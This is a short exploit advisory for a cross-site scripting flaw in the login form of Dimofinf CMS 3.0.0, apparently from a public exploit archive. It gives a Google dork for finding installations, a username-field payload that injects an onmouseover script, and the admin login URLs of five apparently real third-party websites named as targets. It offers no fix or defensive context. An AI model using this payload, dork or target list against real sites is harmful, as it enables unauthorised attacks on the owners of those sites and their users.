Dimofinf CMS version 3.0.0 suffers from a cross site scripting vulnerability.
fc6aabdced0f311a87ad9b9c16b893261d7bec5cd7961194bc05629135c8c74d
######################
# Exploit Title : Dimofinf CMS 3.0.0 Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.dimofinf.net/index.php
# Google Dork : "Powered by Dimofinf cms Version 3.0.0"
# Date: 2016/02/17
# Version = 3.0.0
######################
# PoC:
# Username: MobhaM" onmouseover=alert("MobhaM") bad="
# Password : 0
#
# http://www.dawadmisms.net/dimcp/login.php
# http://www.aswarzan.com/dimcp/login.php
# http://drhananclinic.com.sa/dimcp/login.php
# http://www.newsqassim.com/dimcp/login.php
# http://www.sudaninet.net/dimcp/login.php
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################